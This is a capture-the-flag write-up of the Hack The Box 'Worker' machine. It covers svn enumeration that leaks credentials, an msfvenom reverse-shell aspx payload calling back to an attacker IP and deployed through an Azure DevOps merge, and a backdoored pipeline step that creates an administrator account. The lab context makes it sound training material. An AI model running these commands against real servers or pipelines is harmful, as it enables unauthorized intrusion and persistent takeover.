Node Kind: file
Size in Repository: 88147
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/js/util.js
Name: util.js
URL: svn://10.10.10.203/dimension.worker.htb/assets/js/util.js
Relative URL: ^/dimension.worker.htb/assets/js/util.js
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 12433
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/js/browser.min.js
Name: browser.min.js
URL: svn://10.10.10.203/dimension.worker.htb/assets/js/browser.min.js
Relative URL: ^/dimension.worker.htb/assets/js/browser.min.js
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 1852
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/js/main.js
Name: main.js
URL: svn://10.10.10.203/dimension.worker.htb/assets/js/main.js
Relative URL: ^/dimension.worker.htb/assets/js/main.js
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 8435
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/assets/js/breakpoints.min.js
Name: breakpoints.min.js
URL: svn://10.10.10.203/dimension.worker.htb/assets/js/breakpoints.min.js
Relative URL: ^/dimension.worker.htb/assets/js/breakpoints.min.js
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 2440
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/images
URL: svn://10.10.10.203/dimension.worker.htb/images
Relative URL: ^/dimension.worker.htb/images
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/images/bg.jpg
Name: bg.jpg
URL: svn://10.10.10.203/dimension.worker.htb/images/bg.jpg
Relative URL: ^/dimension.worker.htb/images/bg.jpg
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 37864
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/images/pic03.jpg
Name: pic03.jpg
URL: svn://10.10.10.203/dimension.worker.htb/images/pic03.jpg
Relative URL: ^/dimension.worker.htb/images/pic03.jpg
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 9697
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/images/overlay.png
Name: overlay.png
URL: svn://10.10.10.203/dimension.worker.htb/images/overlay.png
Relative URL: ^/dimension.worker.htb/images/overlay.png
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 4385
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/images/pic01.jpg
Name: pic01.jpg
URL: svn://10.10.10.203/dimension.worker.htb/images/pic01.jpg
Relative URL: ^/dimension.worker.htb/images/pic01.jpg
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 10064
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/images/pic02.jpg
Name: pic02.jpg
URL: svn://10.10.10.203/dimension.worker.htb/images/pic02.jpg
Relative URL: ^/dimension.worker.htb/images/pic02.jpg
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 8904
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/README.txt
Name: README.txt
URL: svn://10.10.10.203/dimension.worker.htb/README.txt
Relative URL: ^/dimension.worker.htb/README.txt
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 771
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: dimension.worker.htb/LICENSE.txt
Name: LICENSE.txt
URL: svn://10.10.10.203/dimension.worker.htb/LICENSE.txt
Relative URL: ^/dimension.worker.htb/LICENSE.txt
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 17128
Last Changed Author: nathen
Last Changed Rev: 1
Last Changed Date: 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020)
Path: moved.txt
Name: moved.txt
URL: svn://10.10.10.203/moved.txt
Relative URL: ^/moved.txt
Repository Root: svn://10.10.10.203
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: file
Size in Repository: 162
Last Changed Author: nathen
Last Changed Rev: 5
Last Changed Date: 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020)
From the output, we learn of a potential user (nathen) and a potential subdomain (dimension.worker.htb).
After adding the potential subdomain to our /etc/hosts file, we go to http://dimension.worker.htb and are presented with a website. After clicking the “Work” link, we are presented with more possible subdomains, which we also add to /etc/hosts. Checking these other subdomain do not appear to present us with additional information. Next, we checkout the subversion repository to look for any interesting information we can find.
$ svn checkout svn://$RHOST
Doing so, we obtain what appears to be the source code of http://dimension.worker.htb and also moved.txt. Looking at moved.txt we are told the latest version of the repo is at http://devops.worker.htb.
moved.txt to learn of another potential subdomainAfter adding this new subdomain to our /etc/hosts file, we try to go to it, however, we are asked for credentials, which we do not have. Next, we decide to take a look at the log to see what changes have been committed. After running svn log, we see that a deployment script was added with revision 2 (r2). A deployment script may contain information disclosure, or potentially credentials, so we decide to checkout the r2 revision.
$ svn checkout -r2 svn://$RHOST
Doing so, we see moved.txt is deleted, and deploy.ps1 is added. Printing out deploy.ps1, we are given potential credentials for nathen.
Initial Foothold
Now that we have credentials, we go back to http://devops.worker.htb/ and log in. Doing so, we are presented with an Azure DevOps page with a project called “SmartHotel360”.
Next, we navigate to “SmartHotel360->Repos”, and are presented with what looks like a GitHub repository that defaults to “Spectral”. Spectral is one of the subdomains we found, so this may potentially be the source code for it. Azure DevOps allows for CI/CD through Azure Pipelines, which means that if we are able to push code to the master branch, we may be able to access it from the webserver – such as for executing a reverse shell. To try to upload a reverse shell to the webserver, we start by creating a branch of the repository – I named mine “khaotic”. Next, we use msfvenom to generate the reverse shell, and use nc to start a reverse shell listener.
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4433 RHOST=10.10.10.203 -f aspx > shellme.aspx
$ nc -lvnp 4433
Once the reverse shell is generated, we upload it to the repository branch.
Next, we click the link to create a new pull request. We approve the request, and create a work item for it.
Lastly, we click “Complete” and “Complete Merge”. Once the changes have been merged to the “Master” branch, we can navigate to http://spectral.worker.htb/shellme.aspx to execute the reverse shell. Doing so, we are given access to the machine as iis apppool\defaultapppool.
iis apppool\defaultapppoolGetting User
After we’ve gotten a shell as iis apppool\defaultapppool, we upload winPEAS to the machine and run it for our initial enumeration. After doing so, we see that the machine has a second drive attached – W:\. Looking around the drive, we find W:\svnrepos\www\conf\passwd, which contains about 40 possible account credentials.
Comparing it to C:\Users\, see what that only user robisl is a valid account. Using the credentials, we use evil-winrm to log into the machine – gaining access to user.txt.
Getting Root
After remoting into the machine as the robisl user, we again run winPEAS, however, we do not find anything of value. Next, we log into the Azure Devops with the credentials for robisl, and select the “PartsUnlimited” project. One thing we can do, is try to make use of CI/CD to potentially push a backdoor to the machine. To do this, we navigate to Pipelines->Azure Repos Git->PartsUnlimited->Starter pipeline->Save and run. On the “Save and run” page, we need to select to create a new branch for the pull request.
After we press the “Save and run” button, we receive an error because the pool is incorrect. To correct this issue, we check Project Settings->Agent Pools, and see there is a pool named “Setup”.
Now that we know the correct name of the agent pool, we can go back to the branch we created in the repo, and edit “azure-pipelines.yml”. We change the pool from “Default” to “Setup”, and from additional research, we learn we can run powershell commands directly from the pipeline as a step. Rather than try to get a reverse shell, we attempt to add a user, and add it to the “administrator” and “remote management users” groups.
# Azure pipeline step to execute powershell to add a user account
net user /add khaotic Bm%d613Ma; net localgroup administrators khaotic /add; net localgroup "Remote Management Users" khaotic /add;
After we’ve committed the changes, we need to create a pull request to have them merged into the master branch. We are able to approve the pull request, however, it needs a work item. To create a work item, we click ‘+’->New work item next to the project name – type/name/etc doesn’t matter. Next, we add the work item to the pull request. To finish up the pull request, we select “Complete” and follow through with the merge.
Once the merge is complete, the master branch should now have the backdoored pipeline. To execute the pipeline, we need to go to Pipelines->“New pipeline”->Azure Repos Git->PartsUnlimited->Click “Run”. Everything should run fine, and our new account should be created.
Using evil-winrm, we should be able to log into the new account, and grab root.txt from C:\Users\Administrator\Desktop\.
Thank you for taking the time to read my write-up. I am interested in other ways this machine has been solved. Feel free to reach out to me and we can discuss it. Thanks!